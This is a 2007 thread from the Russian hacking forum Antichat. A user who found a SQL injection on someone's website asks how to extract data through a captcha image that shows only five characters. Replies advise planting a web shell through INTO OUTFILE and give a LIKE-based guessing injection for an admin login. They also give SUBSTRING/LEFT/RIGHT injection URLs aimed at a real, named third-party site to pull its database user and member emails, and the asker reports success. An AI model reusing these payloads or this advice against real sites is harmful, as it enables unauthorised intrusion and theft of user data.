Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   нужна помощь по sql-injection (https://forum.antichat.xyz/showthread.php?t=36454)

p-range 27.03.2007 01:06
нужна помощь по sql-injection
 
_drastvice_

у меня есть один очень интересный вопрос... есть сайт, нашел на нем sql-injection, а именно в скрипте вида:
Цитата:
http://site/captcha.php?id=-1'+union+select+1,2,3,4,5+from+mysql.user/*
FILE_PRIV есть, могу читать файлы через load_file и записывать через into outfile. Дело в том, что вся инфа выводится на избражение каптчи. Тоесть непосредственно на саму картинку. Длина выводимой инфы максимум - 5 символов.
Вопрос, можно ли как-то отобразить запрос по частям, тоесть , например, начиная с определенной строки, или как-нибудь выйти за пределы длинны в 5 символов?

з.ы. писать только по теме

spider-intruder 27.03.2007 09:30
>и записывать через into outfile

Залей шел например ачатовский :-)
И смотри что хочешь. Там же и доступ к БД получишь поискав в файлах сайта пароль логин к SQL

blaga 27.03.2007 10:10
Limit() не канает?

guest3297 27.03.2007 10:53
Был такой случай
Цитата:
Limit() не канает?
Ну во первых лимит не функция все таки что ты ее прям со скобками.
limit листает базу по колонкам а тут надо по буквам.

Ну если тебе надо выдрать допусить логин пасс админа из бд.

http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin/*

тебе выводит admin

ты дальше юзаешь такую фишку как LIKE

http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin+where+user +like+'admini%'/*
если вывелось admin то значет там еще есть буковка i

http://site/captcha.php?id=-1'+union+select+1,user,3,4,5+from+admin+where+user +like+'administrator%'/*

Если выводиться admin то в базе записанно administrator так же со всеми другими данными.

c411k 27.03.2007 10:59
Цитата:
Сообщение от spider-intruder
>и записывать через into outfile

Залей шел например ачатовский :-)
И смотри что хочешь. Там же и доступ к БД получишь поискав в файлах сайта пароль логин к SQL
вопрос вроде по другому звучал?
Цитата:
можно ли как-то отобразить запрос по частям, тоесть , например, начиная с определенной строки, или как-нибудь выйти за пределы длинны в 5 символов?

Цитата:
Сообщение от blaga
Limit() не канает?
1. что есть "limit()", новая функция?
2. зачем лезть, если не понимаешь сути вопроса? молчание - золото.. ;)

p-range, 6 глава мануала по мускулу рулит :)
http://downloads.mysql.com/docs/refm...ml-chapter.zip
left(str,len)
right(str,len)
http://www.pokerplayersalliance.org/news/newsandarticles_article.php?DID=-122+union+select+1,left(user(),12),3,4,5,6,7,e mail,9,0,1,2,3,4,5,6,7+from+members/*
http://www.pokerplayersalliance.org/news/newsandarticles_article.php?DID=-122+union+select+1,right(user(),12),3,4,5,6,7,e mail,9,0,1,2,3,4,5,6,7+from+members/*
a вообще универсальная это substring(str,pos,len)
http://www.pokerplayersalliance.org/news/newsandarticles_article.php?DID=-122+union+select+1,substring(user(),3,14),3,4,5,6, 7,e mail,9,0,1,2,3,4,5,6,7+from+members/*
substring('antichat',2,6) выведет tich

blaga 27.03.2007 12:25
Цитата:
Ну во первых лимит не функция все таки что ты ее прям со скобками.
limit листает базу по колонкам а тут надо по буквам.
Цитата:
1. что есть "limit()", новая функция?
2. зачем лезть, если не понимаешь сути вопроса? молчание - золото..
согласен, не вкурил изначально в суть вопроса.

p-range 27.03.2007 22:51
сайт пока в дауне... =\ попробую позже, в любом случае всем спасибо за помощь ;)

p-range 28.03.2007 10:51
сайт наконецто работает) спасибо всем за ответы. использовал substring(), все получилось ;)


Время: 18:39